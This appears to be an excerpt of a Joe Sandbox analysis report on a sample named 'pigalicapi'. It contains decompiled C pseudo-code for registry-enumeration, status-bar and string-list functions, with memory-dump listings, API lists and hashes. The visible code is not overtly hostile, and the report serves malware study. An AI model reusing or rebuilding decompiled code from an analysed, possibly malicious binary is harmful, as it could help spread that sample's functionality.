                                                                                                                                                                                                                                                                                          0x00801a9f
                                                                                                                                                                                                                                                                                          0x00801aac
                                                                                                                                                                                                                                                                                          0x00801aad
                                                                                                                                                                                                                                                                                          0x00801ac9
                                                                                                                                                                                                                                                                                          0x00801ac9
                                                                                                                                                                                                                                                                                          0x00801aaa
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008019a5
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?,00000000,00802437,?), ref: 00801970
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00801989
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 008019AC
                                                                                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 008019F1
                                                                                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,?), ref: 00801A4A
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00801A5B
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00801A87
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Close$Enum$Open
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4245071059-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 49cbe26872cd2955a54989efd6b514e540ee4d0dc491ccb35700703778f9a3a6
                                                                                                                                                                                                                                                                                          • Instruction ID: 37e2fbcfeeb4019c829e8953a377e3d4f4d72e249f02f1ffecae113e0b616ba8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49cbe26872cd2955a54989efd6b514e540ee4d0dc491ccb35700703778f9a3a6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE413EB1A0112C9BCB29DB55DC85AEEFBB8FF4D750F00819AE609D2241D6709E85CFE0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                          			E0080AA92() {
                                                                                                                                                                                                                                                                                          				long _t62;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t64;
                                                                                                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                                                                                                          				int _t74;
                                                                                                                                                                                                                                                                                          				int _t77;
                                                                                                                                                                                                                                                                                          				intOrPtr _t80;
                                                                                                                                                                                                                                                                                          				long _t81;
                                                                                                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                                                                                                          				void* _t88;
                                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t115;
                                                                                                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t117;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t118;
                                                                                                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                                                                                                          				void* _t120;
                                                                                                                                                                                                                                                                                          				long _t121;
                                                                                                                                                                                                                                                                                          				signed int _t122;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t118 =  *((intOrPtr*)(_t122 - 0x2b4));
                                                                                                                                                                                                                                                                                          				_t87 =  *(_t122 - 0x2b8);
                                                                                                                                                                                                                                                                                          				_t62 =  *(_t87 + 0x28);
                                                                                                                                                                                                                                                                                          				if(_t62 != 0) {
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t122 - 0x2b0)) = _t122 - 0x2ac;
                                                                                                                                                                                                                                                                                          					 *_t62 =  *_t118;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t62 + 4)) =  *((intOrPtr*)(_t118 + 4));
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t62 + 8)) =  *((intOrPtr*)(_t118 + 8));
                                                                                                                                                                                                                                                                                          					_t64 =  *(_t87 + 4);
                                                                                                                                                                                                                                                                                          					 *(_t122 - 0x2c4) = _t64;
                                                                                                                                                                                                                                                                                          					_t115 = GetDC(_t64);
                                                                                                                                                                                                                                                                                          					 *(_t122 - 0x2cc) = _t115;
                                                                                                                                                                                                                                                                                          					_t68 = SelectObject(_t115, SendMessageA( *(_t87 + 4), 0x31, 0, 0));
                                                                                                                                                                                                                                                                                          					_t116 = 0;
                                                                                                                                                                                                                                                                                          					 *(_t122 - 0x2b8) = _t68;
                                                                                                                                                                                                                                                                                          					 *(_t122 - 0xa4) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t122 - 0xa0)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t122 - 0x9c)) = 0;
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t87 + 4), 0x407, 0, _t122 - 0xa4);
                                                                                                                                                                                                                                                                                          					 *(_t122 - 0x98) = 0;
                                                                                                                                                                                                                                                                                          					E00816820(_t122 - 0x97, 0, 0x7f);
                                                                                                                                                                                                                                                                                          					 *(_t122 - 0x2c0) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t122 - 0x2bc)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t122 - 0x2b4)) =  *(_t122 - 0xa4);
                                                                                                                                                                                                                                                                                          					_t120 = _t118 - _t122 - 0x2ac;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						_t74 =  *(_t122 + _t120 + _t116 * 4 - 0x2ac);
                                                                                                                                                                                                                                                                                          						if(_t74 != 0) {
                                                                                                                                                                                                                                                                                          							LoadStringA( *0x880c0c, _t74, _t122 - 0x98, 0x80);
                                                                                                                                                                                                                                                                                          							_t77 = lstrlenA(_t122 - 0x98);
                                                                                                                                                                                                                                                                                          							if(_t77 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          								_t77 = lstrlenA(_t122 - 0x98);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							GetTextExtentPoint32A( *(_t122 - 0x2cc), _t122 - 0x98, _t77, _t122 - 0x2c0);
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t122 + _t116 * 4 - 0x2ac)) =  *((intOrPtr*)(_t122 - 0x9c)) +  *((intOrPtr*)(_t122 - 0x2b4)) +  *(_t122 - 0x2c0) + 6;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t122 + _t116 * 4 - 0x2ac)) = 0x3fffffff;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t80 =  *((intOrPtr*)(_t122 + _t116 * 4 - 0x2ac));
                                                                                                                                                                                                                                                                                          						_t116 = _t116 + 1;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t122 - 0x2b4)) = _t80;
                                                                                                                                                                                                                                                                                          					} while (_t116 < 3);
                                                                                                                                                                                                                                                                                          					_t81 = SendMessageA( *(_t87 + 4), 0x404, 3, _t122 - 0x2ac);
                                                                                                                                                                                                                                                                                          					_t117 =  *(_t122 - 0x2cc);
                                                                                                                                                                                                                                                                                          					_t121 = _t81;
                                                                                                                                                                                                                                                                                          					SelectObject(_t117,  *(_t122 - 0x2b8));
                                                                                                                                                                                                                                                                                          					ReleaseDC( *(_t122 - 0x2c4), _t117);
                                                                                                                                                                                                                                                                                          					_t103 = _t122 - 0x2ac;
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t122 - 0x2b0)) != _t122 - 0x2ac) {
                                                                                                                                                                                                                                                                                          						E0080D040(_t122 - 0x2b0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t62 = _t121;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0xc));
                                                                                                                                                                                                                                                                                          				_pop(_t114);
                                                                                                                                                                                                                                                                                          				_pop(_t119);
                                                                                                                                                                                                                                                                                          				_pop(_t88);
                                                                                                                                                                                                                                                                                          				return E008159E6(_t62, _t88,  *(_t122 - 0x14) ^ _t122, _t103, _t114, _t119);
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x0080aa92
                                                                                                                                                                                                                                                                                          0x0080aa98
                                                                                                                                                                                                                                                                                          0x0080aa9e
                                                                                                                                                                                                                                                                                          0x0080aaa3
                                                                                                                                                                                                                                                                                          0x0080aab1
                                                                                                                                                                                                                                                                                          0x0080aab7
                                                                                                                                                                                                                                                                                          0x0080aabc
                                                                                                                                                                                                                                                                                          0x0080aac2
                                                                                                                                                                                                                                                                                          0x0080aac5
                                                                                                                                                                                                                                                                                          0x0080aac9
                                                                                                                                                                                                                                                                                          0x0080aad9
                                                                                                                                                                                                                                                                                          0x0080aae1
                                                                                                                                                                                                                                                                                          0x0080aaef
                                                                                                                                                                                                                                                                                          0x0080aaff
                                                                                                                                                                                                                                                                                          0x0080ab02
                                                                                                                                                                                                                                                                                          0x0080ab10
                                                                                                                                                                                                                                                                                          0x0080ab16
                                                                                                                                                                                                                                                                                          0x0080ab1c
                                                                                                                                                                                                                                                                                          0x0080ab22
                                                                                                                                                                                                                                                                                          0x0080ab32
                                                                                                                                                                                                                                                                                          0x0080ab39
                                                                                                                                                                                                                                                                                          0x0080ab4d
                                                                                                                                                                                                                                                                                          0x0080ab53
                                                                                                                                                                                                                                                                                          0x0080ab59
                                                                                                                                                                                                                                                                                          0x0080ab5f
                                                                                                                                                                                                                                                                                          0x0080ab61
                                                                                                                                                                                                                                                                                          0x0080ab64
                                                                                                                                                                                                                                                                                          0x0080ab6d
                                                                                                                                                                                                                                                                                          0x0080ab90
                                                                                                                                                                                                                                                                                          0x0080ab9d
                                                                                                                                                                                                                                                                                          0x0080aba6
                                                                                                                                                                                                                                                                                          0x0080abaf
                                                                                                                                                                                                                                                                                          0x0080abaf
                                                                                                                                                                                                                                                                                          0x0080abcb
                                                                                                                                                                                                                                                                                          0x0080abe7
                                                                                                                                                                                                                                                                                          0x0080ab6f
                                                                                                                                                                                                                                                                                          0x0080ab6f
                                                                                                                                                                                                                                                                                          0x0080ab6f
                                                                                                                                                                                                                                                                                          0x0080abee
                                                                                                                                                                                                                                                                                          0x0080abf5
                                                                                                                                                                                                                                                                                          0x0080abf6
                                                                                                                                                                                                                                                                                          0x0080abfc
                                                                                                                                                                                                                                                                                          0x0080ac17
                                                                                                                                                                                                                                                                                          0x0080ac1d
                                                                                                                                                                                                                                                                                          0x0080ac23
                                                                                                                                                                                                                                                                                          0x0080ac2d
                                                                                                                                                                                                                                                                                          0x0080ac3b
                                                                                                                                                                                                                                                                                          0x0080ac41
                                                                                                                                                                                                                                                                                          0x0080ac4d
                                                                                                                                                                                                                                                                                          0x0080ac55
                                                                                                                                                                                                                                                                                          0x0080ac55
                                                                                                                                                                                                                                                                                          0x0080ac5a
                                                                                                                                                                                                                                                                                          0x0080ac5a
                                                                                                                                                                                                                                                                                          0x0080ac5f
                                                                                                                                                                                                                                                                                          0x0080ac67
                                                                                                                                                                                                                                                                                          0x0080ac68
                                                                                                                                                                                                                                                                                          0x0080ac69
                                                                                                                                                                                                                                                                                          0x0080ac77

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$ObjectSelectlstrlen$ExtentLoadPoint32ReleaseStringText_memset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1950834119-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a55fcf2a9f1e065ac4990cafb9ed65d1399986ef032a95957bd0765b231ab8fd
                                                                                                                                                                                                                                                                                          • Instruction ID: ca46cfdb21638e8e0b27d8606a983c78ff8e9ed5d3ffec020da7be1192c574d9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a55fcf2a9f1e065ac4990cafb9ed65d1399986ef032a95957bd0765b231ab8fd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A412D71A042199FDB24CF24DC88B9AB7B9FF89300F1081D9E50DA7291D7309E81CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                          			E0080B170(signed int* __ebx, CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                                          				CHAR* _v280;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                                                                                                          				CHAR* _t48;
                                                                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                                                                          				CHAR* _t52;
                                                                                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                                                                                          				CHAR* _t63;
                                                                                                                                                                                                                                                                                          				signed int* _t64;
                                                                                                                                                                                                                                                                                          				signed int _t78;
                                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                                          				CHAR* _t88;
                                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t78 = __edx;
                                                                                                                                                                                                                                                                                          				_t64 = __ebx;
                                                                                                                                                                                                                                                                                          				_t38 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t38 ^ _t97;
                                                                                                                                                                                                                                                                                          				_t88 = __ecx;
                                                                                                                                                                                                                                                                                          				_v280 = __ecx;
                                                                                                                                                                                                                                                                                          				if(__ecx == 0) {
                                                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                                                          					return E008159E6(0, _t64, _v8 ^ _t97, _t78, _t83, _t88);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t83 = lstrlenA;
                                                                                                                                                                                                                                                                                          					if(lstrlenA(__ecx) <= 0x103) {
                                                                                                                                                                                                                                                                                          						_t43 = lstrlenA(_t88);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t43 = 0x103;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(lstrcpynA( &_v276, _t88, _t43 + 1) != 0) {
                                                                                                                                                                                                                                                                                          						_t89 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = _t64[1];
                                                                                                                                                                                                                                                                                          						if(_t64[1] <= 0) {
                                                                                                                                                                                                                                                                                          							L12:
                                                                                                                                                                                                                                                                                          							_t47 = _t64[1];
                                                                                                                                                                                                                                                                                          							__eflags = _t47 - _t64[3];
                                                                                                                                                                                                                                                                                          							if(_t47 != _t64[3]) {
                                                                                                                                                                                                                                                                                          								goto L25;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _t47;
                                                                                                                                                                                                                                                                                          								if(_t47 <= 0) {
                                                                                                                                                                                                                                                                                          									goto L25;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									__eflags = _t47 == 1;
                                                                                                                                                                                                                                                                                          									if(_t47 == 1) {
                                                                                                                                                                                                                                                                                          										goto L24;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t78 =  *_t64;
                                                                                                                                                                                                                                                                                          										_t72 = (_t47 - 1) * 0x104;
                                                                                                                                                                                                                                                                                          										_t89 = _t78 + 0x104;
                                                                                                                                                                                                                                                                                          										_t54 = E00815B58(_t64, _t78, _t47 * 0x104, _t78 + 0x104, (_t47 - 1) * 0x104);
                                                                                                                                                                                                                                                                                          										_t98 = _t98 + 0x10;
                                                                                                                                                                                                                                                                                          										__eflags = _t54 - 0x50;
                                                                                                                                                                                                                                                                                          										if(_t54 > 0x50) {
                                                                                                                                                                                                                                                                                          											goto L28;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t14 = _t54 + 0x80b388; // 0x3030300
                                                                                                                                                                                                                                                                                          											switch( *((intOrPtr*)(( *_t14 & 0x000000ff) * 4 +  &M0080B378))) {
                                                                                                                                                                                                                                                                                          												case 0:
                                                                                                                                                                                                                                                                                          													goto L24;
                                                                                                                                                                                                                                                                                          												case 1:
                                                                                                                                                                                                                                                                                          													goto L22;
                                                                                                                                                                                                                                                                                          												case 2:
                                                                                                                                                                                                                                                                                          													goto L23;
                                                                                                                                                                                                                                                                                          												case 3:
                                                                                                                                                                                                                                                                                          													goto L28;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t83 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								__eflags = _t89;
                                                                                                                                                                                                                                                                                          								if(_t89 < 0) {
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags = _t89 - _t64[1];
                                                                                                                                                                                                                                                                                          								if(_t89 >= _t64[1]) {
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t63 = lstrcmpiA( *_t64 + _t83, _v280);
                                                                                                                                                                                                                                                                                          									__eflags = _t63;
                                                                                                                                                                                                                                                                                          									if(_t63 == 0) {
                                                                                                                                                                                                                                                                                          										_t55 = _t64[1];
                                                                                                                                                                                                                                                                                          										__eflags = _t89 - _t55;
                                                                                                                                                                                                                                                                                          										if(_t89 < _t55) {
                                                                                                                                                                                                                                                                                          											__eflags = _t89 - _t55 - 1;
                                                                                                                                                                                                                                                                                          											if(_t89 != _t55 - 1) {
                                                                                                                                                                                                                                                                                          												__eflags =  *_t64 + _t89 * 0x104;
                                                                                                                                                                                                                                                                                          												E00801240( *_t64 + _t89 * 0x104,  *_t64 + _t89 * 0x104, (_t55 - _t89) * 0x104,  &(( *_t64 + _t89 * 0x104)[0x104]), (_t55 - _t89) * 0x104 - 0x104);
                                                                                                                                                                                                                                                                                          												_t98 = _t98 + 0x10;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t64[1] = _t64[1] - 1;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L12;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t89 = _t89 + 1;
                                                                                                                                                                                                                                                                                          										_t83 = _t83 + 0x104;
                                                                                                                                                                                                                                                                                          										__eflags = _t89 - _t64[1];
                                                                                                                                                                                                                                                                                          										if(_t89 < _t64[1]) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L12;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L38;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          							L22:
                                                                                                                                                                                                                                                                                          							_push(0x8007000e);
                                                                                                                                                                                                                                                                                          							L00801170(_t78);
                                                                                                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                                                                                                          							_push(0x80070057);
                                                                                                                                                                                                                                                                                          							L00801170(_t78);
                                                                                                                                                                                                                                                                                          							L24:
                                                                                                                                                                                                                                                                                          							_t23 =  &(_t64[1]);
                                                                                                                                                                                                                                                                                          							 *_t23 = _t64[1] - 1;
                                                                                                                                                                                                                                                                                          							__eflags =  *_t23;
                                                                                                                                                                                                                                                                                          							L25:
                                                                                                                                                                                                                                                                                          							_t78 = _t64[1];
                                                                                                                                                                                                                                                                                          							_t48 = _t64[2];
                                                                                                                                                                                                                                                                                          							__eflags = _t78 - _t48;
                                                                                                                                                                                                                                                                                          							if(_t78 != _t48) {
                                                                                                                                                                                                                                                                                          								L35:
                                                                                                                                                                                                                                                                                          								_t86 = _t64[1] * 0x104 +  *_t64;
                                                                                                                                                                                                                                                                                          								__eflags = _t86;
                                                                                                                                                                                                                                                                                          								if(_t86 != 0) {
                                                                                                                                                                                                                                                                                          									_t91 =  &_v276;
                                                                                                                                                                                                                                                                                          									memcpy(_t86, _t91, 0x41 << 2);
                                                                                                                                                                                                                                                                                          									_t86 = _t91 + 0x82;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t64[1] = _t64[1] + 1;
                                                                                                                                                                                                                                                                                          								_t49 = E0080D690(_t78, _t64);
                                                                                                                                                                                                                                                                                          								__eflags = _v8 ^ _t97;
                                                                                                                                                                                                                                                                                          								return E008159E6(_t49, _t64, _v8 ^ _t97, _t78, _t86, _t64);
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t72 =  *_t64;
                                                                                                                                                                                                                                                                                          								__eflags =  &_v276 - _t72;
                                                                                                                                                                                                                                                                                          								if( &_v276 >= _t72) {
                                                                                                                                                                                                                                                                                          									_t83 =  &_v276;
                                                                                                                                                                                                                                                                                          									__eflags =  &_v276 - _t48 * 0x104 + _t72;
                                                                                                                                                                                                                                                                                          									if( &_v276 < _t48 * 0x104 + _t72) {
                                                                                                                                                                                                                                                                                          										L28:
                                                                                                                                                                                                                                                                                          										_push(0x80004005);
                                                                                                                                                                                                                                                                                          										_t48 = L00801170(_t78);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags = _t48;
                                                                                                                                                                                                                                                                                          								if(_t48 != 0) {
                                                                                                                                                                                                                                                                                          									_t88 = _t78 + _t78;
                                                                                                                                                                                                                                                                                          									__eflags = _t88;
                                                                                                                                                                                                                                                                                          									if(_t88 < 0) {
                                                                                                                                                                                                                                                                                          										goto L5;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										__eflags = _t88 - 0x7e07e0;
                                                                                                                                                                                                                                                                                          										if(_t88 > 0x7e07e0) {
                                                                                                                                                                                                                                                                                          											goto L5;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L33;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t29 =  &(_t48[1]); // 0x1
                                                                                                                                                                                                                                                                                          									_t88 = _t29;
                                                                                                                                                                                                                                                                                          									L33:
                                                                                                                                                                                                                                                                                          									_t52 = E00816254(_t72, _t88, 0x104);
                                                                                                                                                                                                                                                                                          									_t98 = _t98 + 0xc;
                                                                                                                                                                                                                                                                                          									__eflags = _t52;
                                                                                                                                                                                                                                                                                          									if(_t52 == 0) {
                                                                                                                                                                                                                                                                                          										goto L5;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t64[2] = _t88;
                                                                                                                                                                                                                                                                                          										 *_t64 = _t52;
                                                                                                                                                                                                                                                                                          										goto L35;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L38:
                                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                                          0x0080b170
                                                                                                                                                                                                                                                                                          0x0080b170
                                                                                                                                                                                                                                                                                          0x0080b179
                                                                                                                                                                                                                                                                                          0x0080b180
                                                                                                                                                                                                                                                                                          0x0080b184
                                                                                                                                                                                                                                                                                          0x0080b187
                                                                                                                                                                                                                                                                                          0x0080b18f
                                                                                                                                                                                                                                                                                          0x0080b1bf
                                                                                                                                                                                                                                                                                          0x0080b1d0
                                                                                                                                                                                                                                                                                          0x0080b191
                                                                                                                                                                                                                                                                                          0x0080b191
                                                                                                                                                                                                                                                                                          0x0080b19f
                                                                                                                                                                                                                                                                                          0x0080b1a9
                                                                                                                                                                                                                                                                                          0x0080b1a1
                                                                                                                                                                                                                                                                                          0x0080b1a1
                                                                                                                                                                                                                                                                                          0x0080b1a1
                                                                                                                                                                                                                                                                                          0x0080b1bd
                                                                                                                                                                                                                                                                                          0x0080b1d1
                                                                                                                                                                                                                                                                                          0x0080b1d3
                                                                                                                                                                                                                                                                                          0x0080b1d6
                                                                                                                                                                                                                                                                                          0x0080b213
                                                                                                                                                                                                                                                                                          0x0080b213
                                                                                                                                                                                                                                                                                          0x0080b216
                                                                                                                                                                                                                                                                                          0x0080b219
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b21f
                                                                                                                                                                                                                                                                                          0x0080b21f
                                                                                                                                                                                                                                                                                          0x0080b221
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b227
                                                                                                                                                                                                                                                                                          0x0080b22a
                                                                                                                                                                                                                                                                                          0x0080b22c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b232
                                                                                                                                                                                                                                                                                          0x0080b232
                                                                                                                                                                                                                                                                                          0x0080b23d
                                                                                                                                                                                                                                                                                          0x0080b244
                                                                                                                                                                                                                                                                                          0x0080b24d
                                                                                                                                                                                                                                                                                          0x0080b252
                                                                                                                                                                                                                                                                                          0x0080b255
                                                                                                                                                                                                                                                                                          0x0080b258
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b25e
                                                                                                                                                                                                                                                                                          0x0080b25e
                                                                                                                                                                                                                                                                                          0x0080b265
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
